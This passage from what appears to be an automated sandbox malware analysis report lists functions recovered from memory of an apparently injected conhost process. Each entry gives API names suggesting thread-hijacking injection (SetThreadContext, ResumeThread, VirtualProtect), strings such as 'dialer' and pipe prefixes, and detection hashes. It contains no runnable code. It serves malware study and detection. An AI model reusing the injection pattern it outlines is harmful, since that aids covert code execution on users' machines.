1c08c1b5fa9-1c08c1b5fd9 call 1c08c1b798c 619->627 644 1c08c1b600f-1c08c1b6015 622->644 623->622 630 1c08c1b5ff9 call 1c08c1b44c0 623->630 624->628 625->624 631 1c08c1b5e1e-1c08c1b5e68 call 1c08c1b3a50 SetThreadContext 625->631 626->627 633 1c08c1b5f86-1c08c1b5fa1 call 1c08c1b4470 626->633 627->614 629->628 635 1c08c1b5ea5-1c08c1b5eec call 1c08c1b39e0 629->635 630->622 631->624 633->627 635->628 646 1c08c1b5ef0 call 1c08c1b75bd 635->646 647 1c08c1b6057-1c08c1b6075 644->647 648 1c08c1b6017-1c08c1b6055 ResumeThread call 1c08c1b798c 644->648 646->628 650 1c08c1b6089 647->650 651 1c08c1b6077-1c08c1b6086 647->651 648->644 650->588 651->650
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Current$Context
                                                                                                    • String ID:
                                                                                                    • API String ID: 1666949209-0
                                                                                                    • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction ID: c4a2ccf7e2aa8210281e54176d59ed69d8855722abcb0cb655ecceb3da959ed4
                                                                                                    • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction Fuzzy Hash: E0D18A76648B88C1EA719B1AE49479AB7B0F38DF94F104216EA8D47BA5DF38C941CF10
                                                                                                    Function 000001C08C1B30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID: dialer
                                                                                                    • API String ID: 756756679-3528709123
                                                                                                    • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction ID: 0251515d02cc1ba95587aa0360f2d41a0f9f3b498e748d4370d9d5140b82874f
                                                                                                    • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction Fuzzy Hash: F4317171B81B51D6FF169F16A884AE963B4FB4BFA4F44C1209E4847B54EF38C8A58B00
                                                                                                    Function 000001C08C1B1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 517849248-0
                                                                                                    • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction ID: 9559057fc3131046e5e1fb3f7dc394c21a2adf77cf79603a44d122dd742f6254
                                                                                                    • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction Fuzzy Hash: 2A015B31B80A81D6FB11DB22A498BD9A3A1F78EFD0F988035DE8943754DE38C9858700
                                                                                                    Function 000001C08C1B37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 449555515-0
                                                                                                    • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction ID: 661bfaecf9869579411b269240244c5344ff0ba2e323b443e9a157aea630b4a2
                                                                                                    • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction Fuzzy Hash: 98115B75B81B40C6FF229B21E489BDA62B0BB4EF81F448528E94907754EF3CC4288B00
                                                                                                    Function 000001C08C1B90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 1612ce3222621c4531d352f6cc773b3a87b7d032152159d1f514e93b2e9c6cb0
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: 80514932A91A00CAFF56DB15E484F9937B5F35AFB8F51C1609A1A47788DB39DC42CB00
                                                                                                    Function 000001C08C1B90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: 5421432192e96bdd30f0c7d7351afc07d885a1d323534473e34d4e4e39b95996
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: 8D318B32A90640D6FB16EF11E888B9937B5F74BFA8F15C114AE5A07785DB38CD42DB04
                                                                                                    Function 000001C08C1B1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                                                    • String ID: \\?\
                                                                                                    • API String ID: 2719912262-4282027825
                                                                                                    • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction ID: 477f49a618cdd8302df4cf0a96b8f2fdcdd5e76cacab9f2374ce03d785feef5a
                                                                                                    • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction Fuzzy Hash: B9F04F72784641D2FF618B21F5D5BD9A770F74EF98F84C020DA4946964DE2CCA88CB00
                                                                                                    Function 000001C08C1B3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CombinePath
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3422762182-91387939
                                                                                                    • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction ID: daccc836350de90d9e00e79c3f00942a12ea97954eec63f927974d0c25f90db3
                                                                                                    • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction Fuzzy Hash: 8FF08C30B84B80D2FE018B13B9855D9A230EB8EFD0F88D131EE9A07B68CE2CC4918700
                                                                                                    Function 000001C08C1BA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction ID: 3f8d8aa097531b29afdfbce5282b0010faf69b074d717b40c544a0f8e7703db8
                                                                                                    • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction Fuzzy Hash: 5FF08271B91B40D1FF864B60E8C4BE42770EB4EF90F44E019A50F45560CF38C499CB00
                                                                                                    Function 000001C08C1B51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction ID: 344ad8bf0e9a6006015e167405a76f1eacc6bf37871bfcd31e401b50123bbc01
                                                                                                    • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction Fuzzy Hash: 1602BA36659B84C6EB61CB55E49479AB7B0F3C9B94F108115FA8E87BA8DB7CC844CF00
                                                                                                    Function 000001C08C1C0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2210144848-0
                                                                                                    • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction ID: ebb780385b416941e021a986b8ed1aa0490e2eae583c8db18d2a8713296bc03d
                                                                                                    • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction Fuzzy Hash: BD818C32ED0A50C9FF529B65A8C0BED66B0B75EF98F44C116EE0A53B92DA34C852C710
                                                                                                    Function 000001C08C1B57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction ID: a48dfd084f24eeba5f78e6aa4ba0e3d7a9cb9914d148ff914a0508497b5571ab
                                                                                                    • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction Fuzzy Hash: FE61B636959A40C6FB619B16E4D4B5AB7B0F389F64F108115FA8D87BA8DB78C850CF40
                                                                                                    Function 000001C08C1912B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: 3e0fa857876e647ba3988a29b7ea30bc3eb8bf1035d8a47ad9205eea176dc5cb
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: C011B232EC4A4081FE561165E4F1BE988706B5EF74EF8C624AA7706BE68A74CECA4100
                                                                                                    Function 000001C08C1C1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: e79aa12d09970ef45f246943e9e058c6acfc310bfd68157b3ba34990b548b3b3
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: 8C11C632ED4A10C2FF9B1164E4D6BE591706B6FF74F24C6A4BA76063D78B54CC464110
                                                                                                    Function 000001C08C1B3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 1092925422-0
                                                                                                    • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction ID: c21a14b13518c81a0b7c6ebe81f7f2a2005c5366c57269f4ac58e0e52a0fad15
                                                                                                    • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction Fuzzy Hash: 84113036B44B40C6FF559B11F444ADA6670F74AF94F848125EE8907794EF3DC915CB00
                                                                                                    Function 000001C08C1884F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 96398448fd515df88f7a1e0bb9a55d4f0522d71a23098a0d5fb081f7adcf21b1
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: 23518A32A5A600CAFF56DF25E884F9977B5F34AF98F61C134DA0647B88EB34D9428704
                                                                                                    Function 000001C08C1884D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: 8d0156832d12fb02214fb0a0f7cfca8223e1dff1ddf7bb1fa61f8d785975672a
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: FC31AB72A55750C6FB16DF12E884F997BB4F74AF88F55C024AE4A07B88CB38C941C708
                                                                                                    Function 000001C08C1B14B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168794593-0
                                                                                                    • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction ID: f1d0d8f4a793d91c2880f28ec54817c5319b8426b157ab58439670ea49b9caae
                                                                                                    • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction Fuzzy Hash: BF118B72994B88DAFB52DF66A88469AB370F78FF80F448019EB8A03714DF38C4119700
                                                                                                    Function 000001C08C1B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction ID: 3b2f22704a888ccc60d34976356636e7e9bd5e0404c5a51c02f36bd932a40bc9
                                                                                                    • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction Fuzzy Hash: BF71B532A80781C5FFA69E2599D47EAA7B0F74EFE4F848016DD4947B88DE35CD088B00
                                                                                                    Function 000001C08C1B24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction ID: 1fae472cd148a7122e902f486fe42aa3b10125c1922c864887bcf31fd6e01267
                                                                                                    • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction Fuzzy Hash: 6251CA32A84782C1FEA69E2595D4BEA6671F78FFA0F91C015DD4543B9ACE35CC0A8F40
                                                                                                    Function 000001C08C1C0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction ID: 469ea6887b1db5a38fa66ae233ae99f3eb043d73cfebc237d68f28c7adfa837e
                                                                                                    • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction Fuzzy Hash: C741B132A54A80C1EF219F25F4847DA67B0F38DF94F408025EE8D87788EB38C451CB40
                                                                                                    Function 000001C08C1BD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Stringtry_get_function
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2588686239-3893581201
                                                                                                    • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction ID: 370a337db889b87330e4e0902ea49a54805815d51a6ed795863f8e5de2afeb7d
                                                                                                    • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction Fuzzy Hash: 3D11F936648B80C6EB659B56B4806DAB7B4F78EB94F548126EE8D43B59DF38C450CB00
                                                                                                    Function 000001C08C1B94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction ID: e9e47521ecaddf524cb29c51cb963f76b94d5de40e2d830c3b7c03ff89c9bdff
                                                                                                    • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction Fuzzy Hash: 07113D32648B80C2EF628B15E580699B7B4F789F98F588221EE8D07764DF38C952CB00
                                                                                                    Function 000001C08C1BD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 539475747-3084827643
                                                                                                    • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction ID: ac1fe51396398c37e6705911e8c5ef4bfef2c1ec3be8e2d5248814bbace480af
                                                                                                    • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction Fuzzy Hash: B5F08235B94B80D1FF0AAB42F4C0AE56331EB8DF90F58D025B95903B58CE38C995DB11
                                                                                                    Function 000001C08C18CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: try_get_function
                                                                                                    • String ID: November$October
                                                                                                    • API String ID: 2742660187-1636048786
                                                                                                    • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction ID: 1fef6bb2e39cc4d4cd736540549228ae1b831546fd21886e26a19a9fbb4045c1
                                                                                                    • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction Fuzzy Hash: 76E09231F98941D2FE079B51F4E0AE46631EBAEF84F99D032951906356CE38C88A9340
                                                                                                    Function 000001C08C1BD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
